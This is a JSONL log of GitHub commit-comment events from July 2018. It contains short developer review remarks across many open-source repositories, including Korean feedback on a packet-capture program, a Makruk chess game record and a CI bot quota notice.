{"id":"8034602571","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29876989,"position":null,"line":null,"path":null,"commit_id":"d94f238d5702de89292808d88327ba20f4a4c41d","created_at":"2018-07-29T20:36:46Z","updated_at":"2018-07-29T20:36:46Z","author_association":"CONTRIBUTOR","body":"Great :wink: \r\n\r\nI haven't seen your \"new POM\" branch, so I don't know what you have changed there."}},"created_at":"2018-07-29T20:36:46Z"}
{"id":"8034603483","type":"CommitCommentEvent","actor":{"login":"radius314"},"repo":{"name":"radius314/yap"},"payload":{"comment":{"id":29876990,"position":null,"line":null,"path":null,"commit_id":"7b3dc81127307da2ef812d08424b60a70c41a340","created_at":"2018-07-29T20:37:29Z","updated_at":"2018-07-29T20:37:29Z","author_association":"OWNER","body":"abandoning this for something similar right now"}},"created_at":"2018-07-29T20:37:29Z"}
{"id":"8034603946","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29876994,"position":null,"line":null,"path":null,"commit_id":"d94f238d5702de89292808d88327ba20f4a4c41d","created_at":"2018-07-29T20:37:51Z","updated_at":"2018-07-29T20:37:51Z","author_association":"CONTRIBUTOR","body":"Hehe, i've avoided pushing any draft for now ;P"}},"created_at":"2018-07-29T20:37:51Z"}
{"id":"8034605527","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29876996,"position":null,"line":null,"path":null,"commit_id":"d94f238d5702de89292808d88327ba20f4a4c41d","created_at":"2018-07-29T20:39:02Z","updated_at":"2018-07-29T20:39:02Z","author_association":"CONTRIBUTOR","body":"Yeah, I'm not surprised :innocent: "}},"created_at":"2018-07-29T20:39:02Z"}
{"id":"8034605945","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"vngkv123/pcap_test"},"payload":{"comment":{"id":29876997,"position":91,"line":91,"path":"main.cpp","commit_id":"d1c52e51e8730d88d81a31ffdc6c1c3536fd560f","created_at":"2018-07-29T20:39:20Z","updated_at":"2018-07-29T20:39:20Z","author_association":"NONE","body":"char tempIPSetter_1[IP_TEMP_SIZE];\r\n로 선언을 하면 아래에서 free를 할 필요가 없겠죠?\r\n아래 tempIPSetter_2도 동일."}},"created_at":"2018-07-29T20:39:20Z"}
{"id":"8034607668","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"vngkv123/pcap_test"},"payload":{"comment":{"id":29877001,"position":105,"line":105,"path":"main.cpp","commit_id":"d1c52e51e8730d88d81a31ffdc6c1c3536fd560f","created_at":"2018-07-29T20:40:28Z","updated_at":"2018-07-29T20:40:28Z","author_association":"NONE","body":"ip 변수 포인터에서 에서 ip_length를 더하면 바이트 단위가 아니라 구조체 크기 단위로 증가가 됩니다."}},"created_at":"2018-07-29T20:40:28Z"}
{"id":"8034610167","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"vngkv123/pcap_test"},"payload":{"comment":{"id":29877008,"position":115,"line":115,"path":"main.cpp","commit_id":"d1c52e51e8730d88d81a31ffdc6c1c3536fd560f","created_at":"2018-07-29T20:42:19Z","updated_at":"2018-07-29T20:42:19Z","author_association":"NONE","body":"버그가 많습니다. pkt_data의 위치가 정확히 TCP Data의 위치를 가리키는지 디버깅을 통해 확인해 보세요."}},"created_at":"2018-07-29T20:42:19Z"}
{"id":"8034610425","type":"CommitCommentEvent","actor":{"login":"Sanduhr32"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29877009,"position":null,"line":null,"path":null,"commit_id":"bdf8719f98411f076e6dd5aacc17abc7b4df755b","created_at":"2018-07-29T20:42:29Z","updated_at":"2018-07-29T20:42:29Z","author_association":"MEMBER","body":"Because the second requires the list. You can \"pre\", normal and \"late\" init classes in Kotlin"}},"created_at":"2018-07-29T20:42:29Z"}
{"id":"8034610731","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"vngkv123/pcap_test"},"payload":{"comment":{"id":29877011,"position":118,"line":118,"path":"main.cpp","commit_id":"d1c52e51e8730d88d81a31ffdc6c1c3536fd560f","created_at":"2018-07-29T20:42:43Z","updated_at":"2018-07-29T20:42:43Z","author_association":"NONE","body":"isprint 함수 참고해 보세요."}},"created_at":"2018-07-29T20:42:43Z"}
{"id":"8034611453","type":"CommitCommentEvent","actor":{"login":"kenroan"},"repo":{"name":"WA6HXG/MMDVM-Nextion-Screen-Layouts"},"payload":{"comment":{"id":29877014,"position":null,"line":null,"path":null,"commit_id":"083aac0967bde082d9134131482dfcd8939ecca6","created_at":"2018-07-29T20:43:14Z","updated_at":"2018-07-29T20:43:14Z","author_association":"NONE","body":"thanks"}},"created_at":"2018-07-29T20:43:14Z"}
{"id":"8034611871","type":"CommitCommentEvent","actor":{"login":"Sanduhr32"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29877015,"position":null,"line":null,"path":null,"commit_id":"bdf8719f98411f076e6dd5aacc17abc7b4df755b","created_at":"2018-07-29T20:43:32Z","updated_at":"2018-07-29T20:43:32Z","author_association":"MEMBER","body":"I am doing the normal and lateinit here ;)"}},"created_at":"2018-07-29T20:43:32Z"}
{"id":"8034611886","type":"CommitCommentEvent","actor":{"login":"rjmarques"},"repo":{"name":"rjmarques/webasm-mandelbrot"},"payload":{"comment":{"id":29877016,"position":5,"line":12,"path":"index.html","commit_id":"a77d82cb0fe6e7676e706fa68cbf91c4604914de","created_at":"2018-07-29T20:43:33Z","updated_at":"2018-07-29T20:43:33Z","author_association":"OWNER","body":"need to delete this"}},"created_at":"2018-07-29T20:43:33Z"}
{"id":"8034612111","type":"CommitCommentEvent","actor":{"login":"duncte123"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29877017,"position":null,"line":null,"path":null,"commit_id":"bdf8719f98411f076e6dd5aacc17abc7b4df755b","created_at":"2018-07-29T20:43:42Z","updated_at":"2018-07-29T20:43:42Z","author_association":"MEMBER","body":"Can't we just move the list above the init block? Because I think that 2 init blocks looks messy"}},"created_at":"2018-07-29T20:43:42Z"}
{"id":"8034612328","type":"CommitCommentEvent","actor":{"login":"stefano-maggiolo"},"repo":{"name":"lerks/cms"},"payload":{"comment":{"id":29877018,"position":17,"line":61,"path":"cms/server/file_middleware.py","commit_id":"1e5f5df5ef1113492e77014d3176c28e3ed4f88a","created_at":"2018-07-29T20:43:53Z","updated_at":"2018-07-29T20:43:53Z","author_association":"NONE","body":"Typo?"}},"created_at":"2018-07-29T20:43:53Z"}
{"id":"8034612376","type":"CommitCommentEvent","actor":{"login":"stefano-maggiolo"},"repo":{"name":"lerks/cms"},"payload":{"comment":{"id":29877019,"position":19,"line":63,"path":"cms/server/file_middleware.py","commit_id":"1e5f5df5ef1113492e77014d3176c28e3ed4f88a","created_at":"2018-07-29T20:43:55Z","updated_at":"2018-07-29T20:43:55Z","author_association":"NONE","body":"you mean as member variables?"}},"created_at":"2018-07-29T20:43:55Z"}
{"id":"8034612468","type":"CommitCommentEvent","actor":{"login":"hpvb"},"repo":{"name":"godotengine/godot"},"payload":{"comment":{"id":29877020,"position":null,"line":null,"path":null,"commit_id":"200c6cf630aa56b98310b3e747439795f8abbab8","created_at":"2018-07-29T20:44:00Z","updated_at":"2018-07-29T20:44:00Z","author_association":"MEMBER","body":"Not to self: Cherrypick @hpvb"}},"created_at":"2018-07-29T20:44:00Z"}
{"id":"8034614643","type":"CommitCommentEvent","actor":{"login":"Sanduhr32"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29877031,"position":null,"line":null,"path":null,"commit_id":"bdf8719f98411f076e6dd5aacc17abc7b4df755b","created_at":"2018-07-29T20:45:38Z","updated_at":"2018-07-29T20:45:38Z","author_association":"MEMBER","body":"I think it should stay that way so class and object inits are clearly in 2 parts and not look messy."}},"created_at":"2018-07-29T20:45:38Z"}
{"id":"8034616318","type":"CommitCommentEvent","actor":{"login":"CelticMinstrel"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":29877037,"position":null,"line":null,"path":null,"commit_id":"52ae31efb21b31f5bb0763d1da24709e90393c59","created_at":"2018-07-29T20:46:50Z","updated_at":"2018-07-29T20:46:50Z","author_association":"MEMBER","body":"Pretty sure no-one's suggesting breaking compatibility."}},"created_at":"2018-07-29T20:46:50Z"}
{"id":"8034617116","type":"CommitCommentEvent","actor":{"login":"neobuddy89"},"repo":{"name":"EssentialOpenSource/linux"},"payload":{"comment":{"id":29877039,"position":null,"line":null,"path":null,"commit_id":"aae5fda6f5ef5b529cb5027cda824fe33267badd","created_at":"2018-07-29T20:47:28Z","updated_at":"2018-07-29T20:47:28Z","author_association":"NONE","body":"And authorship."}},"created_at":"2018-07-29T20:47:28Z"}
{"id":"8034620500","type":"CommitCommentEvent","actor":{"login":"pedrunf"},"repo":{"name":"bartwe/StaxelTranslations"},"payload":{"comment":{"id":29877048,"position":3,"line":3,"path":"pt-BR/achievement_pt_BR.lang","commit_id":"eab034c35c49939b3b25b72782baeb4c582b96fb","created_at":"2018-07-29T20:49:51Z","updated_at":"2018-07-29T20:49:51Z","author_association":"NONE","body":"Alcance o nível de conhecimento com qualquer aldeão"}},"created_at":"2018-07-29T20:49:51Z"}
{"id":"8034621122","type":"CommitCommentEvent","actor":{"login":"cryptozeny"},"repo":{"name":"cryptozeny/bitzeny"},"payload":{"comment":{"id":29877053,"position":null,"line":null,"path":null,"commit_id":"ea21675aab1b507de0815ab61202b50aa15c469e","created_at":"2018-07-29T20:50:15Z","updated_at":"2018-07-29T20:50:15Z","author_association":"OWNER","body":"i cannot see `debug.log` there is nothing... :sob: i removed the `~/.bitzeny` folder and relaunched but same..."}},"created_at":"2018-07-29T20:50:15Z"}
{"id":"8034621488","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29877054,"position":112,"line":1242,"path":"pom.xml","commit_id":"5111b0be159e7248721930bb48ceff596bd5051b","created_at":"2018-07-29T20:50:33Z","updated_at":"2018-07-29T20:50:33Z","author_association":"CONTRIBUTOR","body":"Well now that i'm in the automatic releasing, i was not in mood to manually rename it Lol"}},"created_at":"2018-07-29T20:50:33Z"}
{"id":"8034622456","type":"CommitCommentEvent","actor":{"login":"pedrunf"},"repo":{"name":"bartwe/StaxelTranslations"},"payload":{"comment":{"id":29877058,"position":5,"line":5,"path":"pt-BR/achievement_pt_BR.lang","commit_id":"eab034c35c49939b3b25b72782baeb4c582b96fb","created_at":"2018-07-29T20:51:16Z","updated_at":"2018-07-29T20:51:16Z","author_association":"NONE","body":"Conhecendo a Aldeia"}},"created_at":"2018-07-29T20:51:16Z"}
{"id":"8034622771","type":"CommitCommentEvent","actor":{"login":"enetsec"},"repo":{"name":"dgiardini/rtl-ais"},"payload":{"comment":{"id":29877060,"position":null,"line":null,"path":null,"commit_id":"b93f9f3cc1b9884afc940a4e1a6e6339eb4a166f","created_at":"2018-07-29T20:51:29Z","updated_at":"2018-07-29T20:51:29Z","author_association":"NONE","body":"Hi dgiardini, I made the updates as indicated, but there was no result.\r\nThe problem persists the same with -t 10 or 120.\r\nI do not know what happens"}},"created_at":"2018-07-29T20:51:29Z"}
{"id":"8034623043","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29877061,"position":112,"line":1242,"path":"pom.xml","commit_id":"5111b0be159e7248721930bb48ceff596bd5051b","created_at":"2018-07-29T20:51:41Z","updated_at":"2018-07-29T20:51:41Z","author_association":"CONTRIBUTOR","body":"That explains it ;P"}},"created_at":"2018-07-29T20:51:41Z"}
{"id":"8034629627","type":"CommitCommentEvent","actor":{"login":"Anonymphous"},"repo":{"name":"RMerl/asuswrt-merlin.ng"},"payload":{"comment":{"id":29877074,"position":null,"line":null,"path":null,"commit_id":"3f7e51000dfd8efc0d60ffcd291bc4fb1aa83d0f","created_at":"2018-07-29T20:56:23Z","updated_at":"2018-07-29T20:56:23Z","author_association":"NONE","body":"Maybe it would be a nice idea, since it has been fully retired, to push current asuswrt-merlin/ repo master branch to something like /RMerl/asuswrt-merlin.old or .legacy, then delete this repository, and recreate it, pushing the master of asuswrt-merlin.ng repo?"}},"created_at":"2018-07-29T20:56:23Z"}
{"id":"8034630710","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"iRainDropYT/Kitssss"},"payload":{"comment":{"id":29877078,"position":null,"line":null,"path":null,"commit_id":"6dd4daf1e3fd7c965b15e5047e24c58fea093c45","created_at":"2018-07-29T20:57:11Z","updated_at":"2018-07-29T20:57:11Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\nYou are trying to create too many projects. We only allow creating up to 6\nnew projects per week.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota **for free** if you are really trying to\nbuild **your own plugins**, i.e. not forks or copied code.\n\n**Do not try to use another account just to overcome this limit**, or you\nmay be **banned** from Poggit.\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/iRainDropYT/Kitssss/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `f59f8cd0-9371-11e8-9943-fbc6d8ba86df`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-29T20:57:11Z"}
{"id":"8034635916","type":"CommitCommentEvent","actor":{"login":"khatley"},"repo":{"name":"Matoyak/project_cthulhu"},"payload":{"comment":{"id":29877088,"position":4,"line":4,"path":"project_cthulhu.sln","commit_id":"6cb4ed05a67a88130c157e156238663128754644","created_at":"2018-07-29T21:00:55Z","updated_at":"2018-07-29T21:00:55Z","author_association":"NONE","body":"Listen here buckaroo"}},"created_at":"2018-07-29T21:00:55Z"}
{"id":"8034638962","type":"CommitCommentEvent","actor":{"login":"thaichessswinboard"},"repo":{"name":"ianfab/Makruk-Stockfish"},"payload":{"comment":{"id":29877097,"position":null,"line":null,"path":null,"commit_id":"72e094284146c2db8f14c511e2794099c3158305","created_at":"2018-07-29T21:03:12Z","updated_at":"2018-07-29T21:03:12Z","author_association":"NONE","body":"hi again this is Pgn that I try to move and beat program from position. It hard to beat program but anyway it show how to move and checkmate by KNBQKR. IT very long pgn. if program doesn't know the concept it will checkmate my average players who have experience will see in this advance moves. I change the name of stockfish to Makruk Advance 10.\r\n\r\n[Event \"Computer Chess Game\"]\r\n[Site \"PCST\"]\r\n[Date \"2018.07.29\"]\r\n[Round \"-\"]\r\n[White \"Makruk Advance 10 64 POPCNT (UCI2WB)\"]\r\n[Black \"ภูมิชาย\"]\r\n[Result \"0-1\"]\r\n[TimeControl \"4000/300\"]\r\n[Variant \"makruk\"]\r\n[FEN \"8/8/4m3/2ksn3/8/2K5/8/7R w 0 1\"]\r\n[SetUp \"1\"]\r\n\r\n{--------------\r\n. . . . . . . .\r\n. . . . . . . .\r\n. . . . m . . .\r\n. . k s n . . .\r\n. . . . . . . .\r\n. . K . . . . .\r\n. . . . . . . .\r\n. . . . . . . R\r\nwhite to play\r\n--------------}\r\n1. Kc2 {+0.00/24} Mf5 2. Kd1 {+0.00/27 8} Me4 3. Rh8 {+0.00/27 1.6} Kb4 4.\r\nRe8 {+0.00/32 12} Nf3 5. Rc8 {+0.00/28 3} Sd4 6. Ke2 {+0.00/32 5} Ne5 7.\r\nKf2 {+0.00/32} Kb5 8. Kg3 {+0.77/27 10} Nc6 9. Kh4 {+0.73/23 8} Kc5 10. Ra8\r\n{+0.68/24 6} Kd6 11. Ra2 {+0.00/23 7} Se5 12. Ra1 {+0.00/26 0.9} Sf6 13.\r\nKg3 {+0.00/25 4} Sg5 14. Ra8 {+0.00/25 6} Ke5 15. Re8+ {+0.00/21 3} Kd4 16.\r\nRg8 {+0.00/22 3} Sf6 17. Kf4 {+0.00/26 5} Ne7 18. Ra8 {+0.00/25 2.3} Mf5\r\n19. Ra4+ {+0.00/24 9} Kc3 20. Ke3 {+0.00/19 7} Nd5+ 21. Ke2 {+0.00/25} Se5\r\n22. Ra2 {+0.00/23 2.2} Sf4 23. Ra4 {+0.00/29} Nb4 24. Ra3+ {+0.00/28 4} Kc4\r\n25. Kf1 {+0.00/27 3} Mg4 26. Ke2 {+0.00/33 6} Nd5 27. Kd2 {+0.00/31 4} Mf3\r\n28. Ra4+ {+0.00/27 2.0} Nb4 29. Ra3 {+0.00/32 1.8} Me4 30. Ra8 {+0.00/36}\r\nNc6 31. Ra3 {+0.00/31 11} Se5 32. Ke2 {+0.00/26 2.5} Nd4+ 33. Kd2\r\n{+0.00/25 1.5} Nb3+ 34. Ke3 {+0.00/30 5} Nc1 35. Ra4+ {+0.00/28 1.3} Kc3\r\n36. Ra8 {+0.00/35 4} Nd3 37. Rc8+ {+0.00/36 3} Kb4 38. Ke2 {+0.00/35 4}\r\nNf4+ 39. Kf2 {+0.91/18 0.5} Kb5 40. Kg3 {+0.60/16 0.8} Nd5 41. Kg4\r\n{+0.84/21 2.1} Kb6 42. Kg5 {+0.15/22 11} Nc7 43. Rb8+ {+0.00/25 4} Kc6 44.\r\nKh4 {+0.00/25 5} Kd6 45. Rd8+ {+0.00/26 4} Ke6 46. Kg3 {+0.00/24 1.6} Kf5\r\n47. Rf8+ {+0.00/22 3} Kg6 48. Kf2 {+0.31/22 6} Nd5 49. Rg8+ {+0.00/19 1.7}\r\nKf5 50. Rd8 {+0.00/26} Sf4 51. Ke1 {+0.00/21 1.1} Se3 52. Rf8+ {+0.00/22 3}\r\nKe5 53. Kf1 {+0.00/25 0.3} Nf4 54. Ra8 {-0.09/26 16} Kd5 55. Ra5+\r\n{-0.18/26 13} Kd4 56. Ra4+ {-0.95/19 3} Ke5 57. Ra5+ {-0.20/16 0.6} Md5 58.\r\nRa8 {-0.18/18} Ke4 59. Ke1 {-6.03/18 5} Nd3+ 60. Kd1 {-5.48/20} Kd4 61. Rh8\r\n{-0.37/19 4} Mc4 62. Kc2 {+0.00/19 2.3} Nb4+ 63. Kb2 {+0.00/26 1.4} Sd2 64.\r\nRh4+ {+0.00/25 2.1} Kc5 65. Rh8 {+0.00/24 0.8} Nd5 {+2.17/23} 66. Kc2\r\n{+0.00/20} Se3 {+0.00/25 0.1} 67. Rh4 {+0.00/29 7} Nf4 {+0.00/27 3} 68. Rh8\r\n{+0.00/21 12} Kb4 {+0.00/27 5} 69. Rd8 {+0.00/28 9} Md5 70. Re8\r\n{+0.00/20 14} Sd4 71. Kd2 {+0.00/23} Ne6 72. Ke2 {+0.00/23 25} Kc5 73. Rc8+\r\n{+0.00/19 18} Kd6 74. Kd1 {+0.00/23} Ke5 75. Kc2 {+0.00/25 10} Ke4 76. Rh8\r\n{+0.00/20 4} Mc4 77. Kb2 {+0.00/21 3} Nf4 78. Rh4 {+0.00/28 0.1} Sc5 79.\r\nKa3 {+0.00/29 7} Sb6 80. Kb4 {+0.00/29 8} Md5 81. Rh6 {+0.00/28 7} Ne6 82.\r\nRh4+ {+0.00/30 5} Ke5 83. Rh1 {+0.00/26 3} Nd8 84. Rf1 {+0.00/25 26} Nc6+\r\n85. Kc3 {+0.09/22 11} Sc5 86. Kd2 {+0.20/17 3} Me4 87. Rf8 {+0.00/17 2.4}\r\nSc4 88. Ke3 {+1.64/15 2.3} Sd5 89. Re8+ {+0.32/18 2.4} Kf5 90. Kd2\r\n{+0.00/23 12} Sd4 91. Rf8+ {+0.92/14 1.5} Ke6 92. Ke1 {+0.00/25 4} Se3 93.\r\nKd1 {+0.00/22 2.9} Ne5 94. Kc1 {+0.00/22 4} Md3 95. Kb2 {+0.00/19 6} Sd4\r\n96. Rd8 {+0.47/18 15} Sc5 97. Ka2 {+0.00/22 19} Nc6 98. Rh8 {+0.00/25 5}\r\nSb4 99. Rh5 {+0.00/21 6} Mc2 100. Kb2 {+0.00/23 3} Nd4 101. Rg5\r\n{+0.00/23 9} Md3 102. Rh5 {+0.00/29 4} Me4 103. Kc1 {+0.82/15 7} Sc3 104.\r\nKd1 {+0.43/19 9} Mf3 105. Ke1 {+0.65/19 5} Nf5 106. Rh8 {+0.65/23 0.1} Ke5\r\n107. Rc8 {+0.31/21 15} Sd4 108. Re8+ {+0.00/22 9} Kf4 109. Kd2 {+0.00/25}\r\nMe4 110. Kc2 {+0.00/21 14} Ke3 111. Rh8 {+0.00/22 4} Md3+ 112. Kb3\r\n{+0.00/21 6} Sc5 113. Kc3 {+0.00/20 7} Mc4 114. Kb2 {+0.00/19 3} Ng3 115.\r\nRh3 {+0.00/20 12} Kf2 116. Rh4 {+0.00/31 7} Ne2 117. Rh3 {+0.00/25 11} Ke1\r\n118. Rh2 {+0.00/26 12} Kd2 119. Ka3 {+0.00/25 2.6} Mb5 120. Rh5\r\n{+0.76/14 1.4} Sb6 121. Rh4 {+0.00/27 32} Kd3 122. Kb4 {+0.00/28 4} Nd4\r\n123. Rh3+ {+0.00/28 12} Ke4 124. Rh6 {+0.77/15 4} Nc6+ 125. Kc3\r\n{+0.85/15 5} Sc5 126. Kd2 {+1.26/14 0.6} Ne5 127. Rh5 {+0.00/25 21} Mc4\r\n128. Ke2 {+0.00/22 9} Md3+ 129. Kf2 {+0.69/15 1.2} Kf4 130. Rh4+\r\n{+0.00/17 12} Ng4+ 131. Ke1 {+0.00/23} Sc4 132. Rh3 {+0.00/22 12} Ne5 133.\r\nKf2 {-6.17/18 19} Me4 134. Rh4+ {+0.00/20 10} Ng4+ 135. Ke1 {+0.00/24 0.1}\r\nSd3 136. Kd1 {+0.00/26 11} Mf3 137. Rh8 {+0.00/17 7} Ke3 138. Kc1\r\n{+0.00/19 1.3} Me4 139. Re8 {-6.27/19 9} Kd4 140. Kb1 {-6.37/21 4} Md5 141.\r\nRc8 {-6.32/20 2.9} Mc4 142. Kb2 {-6.22/17 1.4} Ne5 143. Rh8 {-6.27/20 3}\r\nSd2 144. Rh4+ {+0.74/12 1.8} Kc5 145. Re4 {+0.00/19 2.0} Kd5 146. Rh4\r\n{+0.00/25 5} Nf3 147. Rh3 {+0.80/15 1.9} Nd4 148. Rh2 {+0.75/14 3} Se3 149.\r\nKa3 {+0.83/14 1.8} Kc5 150. Ka4 {+0.00/17 4} Mb5+ 151. Ka3 {+0.00/21 0.8}\r\nSf4 152. Kb2 {+0.81/13 0.8} Kc4 153. Rh3 {-0.09/22 2.8} Ma4 154. Rh8\r\n{+0.00/15 0.8} Kd3 155. Rh1 {+0.00/25 1.1} Nf3 156. Rc1 {+0.00/13 0.8} Nd2\r\n157. Rc3+ {+0.00/16 2.5} Kd4 158. Rc7 {+0.00/18 2.3} Nc4+ 159. Ka1\r\n{+0.00/16 0.6} Kc3 160. Rg7 {-6.32/13 0.5} Se5 161. Rg3+ {+0.00/10 0.3} Kc2\r\n162. Rg4 {+0.00/24 0.3} Mb3 163. Rg2+ {+0.00/1 0.1} Kc3 164. Rg3+\r\n{+50.00/1} Kb4 165. Rg4 {-0.09/4 0.1} Sd6 166. Rg3 {-6.37/1 0.2} Nd2 167.\r\nRg1 {+49.80/1} Sc5 168. Rb1 {+49.80/1} Sb6 169. Rh1 {+49.80/1} Sa5 170.\r\nRh4+ {+50.00/1 0.1} Kc3 171. Rh3+ {+50.00/1 0.1} Kc2 172. Rh5 {+0.11/2} Sb4\r\n173. Rc5+ {-49.80/1 0.1} Nc4 174. Rc7 {-1000.09/47} Kc3 175. Rb7\r\n{-49.80/1 0.1} Sa3 176. Rxb3+ {-1000.02/85 0.1} Kxb3 177. Kb1\r\n{-1000.01/127} Sb2#\r\n{Xboard adjudication: Checkmate} 0-1\r\n\r\n "}},"created_at":"2018-07-29T21:03:12Z"}
{"id":"8034640003","type":"CommitCommentEvent","actor":{"login":"Stono"},"repo":{"name":"aledbf/ingress-nginx"},"payload":{"comment":{"id":29877099,"position":47,"line":867,"path":"rootfs/etc/nginx/template/nginx.tmpl","commit_id":"e3faa80aa96474c25c90c74dfd6a472b626bb719","created_at":"2018-07-29T21:04:02Z","updated_at":"2018-07-29T21:04:02Z","author_association":"NONE","body":"Not sure if you'd want to do this btw, it's my understanding that responses containing a set-cookie would then be cached, which you presumably wouldn't want as then you'd be sending the same cookie to all users?"}},"created_at":"2018-07-29T21:04:02Z"}
{"id":"8034642458","type":"CommitCommentEvent","actor":{"login":"thaichessswinboard"},"repo":{"name":"ianfab/Makruk-Stockfish"},"payload":{"comment":{"id":29877100,"position":null,"line":null,"path":null,"commit_id":"72e094284146c2db8f14c511e2794099c3158305","created_at":"2018-07-29T21:05:53Z","updated_at":"2018-07-29T21:05:53Z","author_association":"NONE","body":"sorry about the pgn that move a lot of time because I forget how to move style to make advance to play high rank player."}},"created_at":"2018-07-29T21:05:53Z"}
{"id":"8034643240","type":"CommitCommentEvent","actor":{"login":"jrmarino"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29877108,"position":null,"line":null,"path":null,"commit_id":"27e0f1e422fade105ccc5f47a358b31d240098f0","created_at":"2018-07-29T21:06:28Z","updated_at":"2018-07-29T21:06:28Z","author_association":"OWNER","body":"repology says the current version of gle is 4.2.5!!\r\n\r\nwhy the legacy version?  If I had to guess, it's because that's what FreeBSD has, but that's not a good reason.  We should already be bringing in the latest version, right?  As a rule?"}},"created_at":"2018-07-29T21:06:28Z"}
{"id":"8034643676","type":"CommitCommentEvent","actor":{"login":"jrmarino"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29877109,"position":null,"line":null,"path":null,"commit_id":"27e0f1e422fade105ccc5f47a358b31d240098f0","created_at":"2018-07-29T21:06:48Z","updated_at":"2018-07-29T21:06:48Z","author_association":"OWNER","body":"Can we get this updated to the latest version?"}},"created_at":"2018-07-29T21:06:48Z"}
{"id":"8034655714","type":"CommitCommentEvent","actor":{"login":"minombreesjeff"},"repo":{"name":"minombreesjeff/darwin_env"},"payload":{"comment":{"id":29877127,"position":null,"line":null,"path":null,"commit_id":"85edf405a327bfd20d1ac88fad04890de30f72cf","created_at":"2018-07-29T21:15:35Z","updated_at":"2018-07-29T21:15:35Z","author_association":"OWNER","body":"Collision 49.30.1~51"}},"created_at":"2018-07-29T21:15:35Z"}
{"id":"8034657500","type":"CommitCommentEvent","actor":{"login":"mamez"},"repo":{"name":"mamez/recicla"},"payload":{"comment":{"id":29877131,"position":null,"line":null,"path":null,"commit_id":"ed07eaba57e04b727549418ac27473a490f34b61","created_at":"2018-07-29T21:16:56Z","updated_at":"2018-07-29T21:16:56Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-29T21:16:56Z"}
{"id":"8034657786","type":"CommitCommentEvent","actor":{"login":"alanshaw"},"repo":{"name":"ipfs/js-ipfs"},"payload":{"comment":{"id":29877132,"position":6,"line":14,"path":"src/core/components/dag.js","commit_id":"d299ed77c288d82ce807af0ec7a5b2605336626f","created_at":"2018-07-29T21:17:09Z","updated_at":"2018-07-29T21:17:09Z","author_association":"MEMBER","body":"@negamaxi yes please for a PR ❤️ "}},"created_at":"2018-07-29T21:17:09Z"}
{"id":"8034659507","type":"CommitCommentEvent","actor":{"login":"dracc"},"repo":{"name":"redseiko/Segs"},"payload":{"comment":{"id":29877140,"position":175,"line":458,"path":"Projects/CoX/Utilities/dbtool/main.cpp","commit_id":"75f83a884289c8b076bb8317b3ecc0969af001eb","created_at":"2018-07-29T21:18:25Z","updated_at":"2018-07-29T21:18:25Z","author_association":"NONE","body":"Stray whitespace?"}},"created_at":"2018-07-29T21:18:25Z"}
{"id":"8034661279","type":"CommitCommentEvent","actor":{"login":"mburyakov"},"repo":{"name":"mburyakov/fgallery"},"payload":{"comment":{"id":29877142,"position":null,"line":null,"path":null,"commit_id":"41f1eb572fa110d2e518d02b8c900e714d239f7a","created_at":"2018-07-29T21:19:46Z","updated_at":"2018-07-29T21:19:46Z","author_association":"OWNER","body":"image size is computed wrong"}},"created_at":"2018-07-29T21:19:46Z"}
{"id":"8034661419","type":"CommitCommentEvent","actor":{"login":"dadoonet"},"repo":{"name":"elastic/beats"},"payload":{"comment":{"id":29877143,"position":113,"line":113,"path":"libbeat/cloudid/cloudid.go","commit_id":"bd6981df3e461c5ae34bf62516637f7c03701efd","created_at":"2018-07-29T21:19:51Z","updated_at":"2018-07-29T21:19:51Z","author_association":"MEMBER","body":"I'm wondering why we are using `443` although the \"official\" port in cloud (as advertised in the cloud console) is `9243`. Not an issue as both are working. Just wondering why we choose this one."}},"created_at":"2018-07-29T21:19:51Z"}
{"id":"8034662411","type":"CommitCommentEvent","actor":{"login":"redseiko"},"repo":{"name":"redseiko/Segs"},"payload":{"comment":{"id":29877144,"position":175,"line":458,"path":"Projects/CoX/Utilities/dbtool/main.cpp","commit_id":"75f83a884289c8b076bb8317b3ecc0969af001eb","created_at":"2018-07-29T21:20:36Z","updated_at":"2018-07-29T21:20:36Z","author_association":"OWNER","body":"Whoops, thanks. Will fix in the next commit."}},"created_at":"2018-07-29T21:20:36Z"}
